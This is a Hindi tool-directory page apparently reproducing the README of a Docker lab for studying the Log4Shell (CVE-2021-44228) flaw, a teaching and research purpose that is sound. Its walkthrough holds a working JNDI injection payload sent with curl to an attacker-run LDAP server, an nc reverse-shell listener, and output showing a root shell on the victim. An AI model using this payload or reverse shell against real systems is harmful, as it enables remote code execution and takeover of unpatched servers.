Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
mi-laboratorio-log4shell — Log4Shell (CVE-2021-44228) भेद्यता का ऑडिट करने और अध्ययन करने के लिए Docker में स्वचालित प्लग एंड प्ले प्रयोगशाला | Kitploit
उपकरण/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmafo-sec/mi-laboratorio-log4shell

mi-laboratorio-log4shell

Log4Shell (CVE-2021-44228) भेद्यता का ऑडिट करने और अध्ययन करने के लिए Docker में स्वचालित प्लग एंड प्ले प्रयोगशाला

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚀 स्वचालित Log4Shell (CVE-2021-44228) प्ले एंड प्लग प्रयोगशाला

Log4Shell (CVE-2021-44228) रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को प्रदर्शित करने और ऑडिट करने के लिए डिज़ाइन की गई एक स्वचालित, सिंगल-कमांड सुरक्षा अनुसंधान प्रयोगशाला।

यह परियोजना सभी आवश्यक घटकों (भेद्य अनुप्रयोग, दुर्भावनापूर्ण LDAP रेफरल सर्वर, और हमलावर उपकरण) को Docker Compose का उपयोग करके एक एकीकृत, पृथक नेटवर्क अवसंरचना में समेकित करती है।


⚙️ मुख्य विशेषताएँ

  • 100% प्लग एंड प्ले: कोई मैन्युअल IP कॉन्फ़िगरेशन, .env फ़ाइल संपादन, या नेटवर्क संरेखण आवश्यक नहीं है। सब कुछ Docker के आंतरिक DNS के माध्यम से स्वचालित रूप से हल हो जाता है।
  • बाइटकोड संगतता: एक्सप्लॉइट कोड स्वचालित रूप से क्रॉस-कंपाइल किया जाता है, जो पीड़ित के पुराने Java Virtual Machine (JVM) आर्किटेक्चर के साथ संगतता सुनिश्चित करता है, जिससे UnsupportedClassVersionError समस्याएँ समाप्त हो जाती हैं।
  • केंद्रीकृत तैनाती: पूरी तरह से एक एकल ऑर्केस्ट्रेशन परत और एक इंटरैक्टिव Bash स्क्रिप्ट मैनेजर (configurar.sh) द्वारा नियंत्रित, जो कंटेनर टियरडाउन, कैश सफ़ाई, और पुनर्निर्माण को स्वचालित करता है।

🏗️ आर्किटेक्चर अवलोकन

प्रयोगशाला तीन प्रमुख अभिनेताओं के साथ एक पृथक ब्रिज नेटवर्क (red-log4shell) बनाती है:

  1. पीड़ित (web-vulnerable): एक Spring Boot वेब एप्लिकेशन जो Log4j के एक अनपैच्ड, भेद्य संस्करण (2.14.1) का उपयोग करता है और Java 8u111 पर चलता है।
  2. LDAP सर्वर (ldap-malicioso): आने वाले लुकअप अनुरोधों को रोकने और पीड़ित को गतिशील रूप से हमलावर के पेलोड पर रीडायरेक्ट करने के लिए marshalsec द्वारा संचालित।
  3. हमलावर (kali-tools): एक कस्टम Kali Linux कंटेनर जो संकलित एक्सप्लॉइट पेलोड (Exploit.class) को वितरित करने के लिए एक Python HTTP सर्वर और रिवर्स शेल को पकड़ने के लिए एक Netcat लिसनर होस्ट करता है।

⚙️ त्वरित आरंभ

Docker स्थापित किसी भी Linux मशीन पर इस प्रयोगशाला को तैनात करने के लिए, अपने टर्मिनल में निम्नलिखित कमांड चलाएँ:

root@kitploit:~
# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. प्रोजेक्ट निर्देशिका में जाएँ
cd mi-laboratorio-log4shell

# 3. स्क्रिप्ट मैनेजर को निष्पादन अनुमतियाँ दें और प्रयोगशाला लॉन्च करें
chmod +x configurar.sh
./configurar.sh

🚀 एक्सप्लॉइट कैसे करें (चरण-दर-चरण)

एक बार स्क्रिप्ट के माध्यम से अवसंरचना स्वचालित रूप से चालू हो जाने पर, रिवर्स शेल को ट्रिगर करने और कैप्चर करने के लिए इन चरणों का पालन करें। चरण 1: Netcat लिसनर सेट अप करें

अपनी होस्ट मशीन (Ubuntu) पर एक नया टर्मिनल खोलें और आने वाले कनेक्शनों के लिए Netcat को स्टैंडबाय पर रखने हेतु हमलावर के कंटेनर से जुड़ें: Bash

sudo docker exec -it kali-tools bash

Kali कंटेनर के अंदर, लिसनर शुरू करें: Bash

nc -lvnp 4444

आपको संदेश दिखाई देगा: listening on [any] 4444 ... चरण 2: हमला वेक्टर लॉन्च करें

अपनी होस्ट मशीन पर एक अलग टर्मिनल खोलें और X-Api-Version हेडर के भीतर एम्बेडेड दुर्भावनापूर्ण JNDI इंजेक्शन स्ट्रिंग भेजें: Bash

curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

चरण 3: रिवर्स शेल सत्यापित करें

अपने Netcat टर्मिनल पर वापस जाएँ। आपको एक सक्रिय कनेक्शन दिखाई देना चाहिए। अब आप पीड़ित सर्वर के अंदर रूट के रूप में कमांड निष्पादित कर सकते हैं: Bash

connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164 whoami root


⚠️ अस्वीकरण

यह रिपॉजिटरी पूर्ण रूप से शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, और अधिकृत शैक्षणिक ऑडिटिंग के लिए बनाई गई है। अवसंरचना स्वामियों से स्पष्ट, पूर्व लिखित प्राधिकरण के बिना इन उपकरणों या हमले अवसंरचना को कभी निष्पादित न करें।

टूल डाउनलोड करें